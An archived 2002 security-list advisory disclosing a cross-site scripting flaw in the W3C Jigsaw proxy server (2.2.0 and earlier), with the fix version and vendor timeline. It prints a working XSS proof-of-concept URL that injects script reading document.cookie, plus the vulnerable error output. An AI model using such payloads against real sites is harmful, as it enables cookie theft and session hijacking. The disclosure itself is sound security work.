W3C Jigsaw Proxy Server: Cross-Site Scripting Vulnerability (REPOST)

From: TAKAGI, Hiromitsu (takagi.hiromitsuat_private)
Date: Sat Aug 17 2002 - 12:10:45 PDT

Next message: securityat_private: "Security Update: [CSSA-2002-SCO.28.1] UnixWare 7.1.1 Open UNIX 8.0.0 : REVISED: rpc.ttdbserverd file creation/deletion and buffer overflow vulnerabilities"

Previous message: securityat_private: "[Full-Disclosure] Security Update: [CSSA-2002-SCO.28.1] UnixWare 7.1.1 Open UNIX 8.0.0 : REVISED: rpc.ttdbserverd file creation/deletion and buffer overflow vulnerabilities"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

W3C Jigsaw Proxy Server: Cross-Site Scripting Vulnerability
===========================================================

Affected:
  Jigsaw 2.2.0 and earlier
  http://www.w3.org/Jigsaw/RelNotes.html#2.2.0

Fixed:
  Jigsaw 2.2.1
  http://www.w3.org/Jigsaw/RelNotes.html#2.2.1

Exploit:
  http://nonexistenthost.google.com/>document.write(document.cookie)</SCRIPT>

  ========================================================
  An HTTP error occured while getting: <p>
  <strong>http://nonexistenthost.google.com/>document.write(document.cookie)</SCRIPT></strong><p>
  Details "The host name [nonexistenthost.google.com] couldn't be resolved.
  Details: "nonexistenthost.google.com"".<hr>Generated by
  <i>http://.............:8001/
...snip...
  ========================================================
  
  Similar problems have been found in Proxomitron Naoko-4 BetaFour,
  Microsoft ISA Server and Squid 2.4 DEVEL4.
  <http://www.securityfocus.com/bid/3087>
  <http://www.microsoft.com/technet/security/bulletin/MS01-045.asp>
  <http://www.securityfocus.com/archive/1/197606>

Vendor Status:
  Aug 10, 2001: Notified
  Jan  4, 2002: Responded 
  Apr  8, 2002: Fix released


Best regards,
--
Hiromitsu Takagi
http://staff.aist.go.jp/takagi.hiromitsu/

This archive was generated by hypermail 2b30 : Mon Aug 19 2002 - 15:50:54 PDT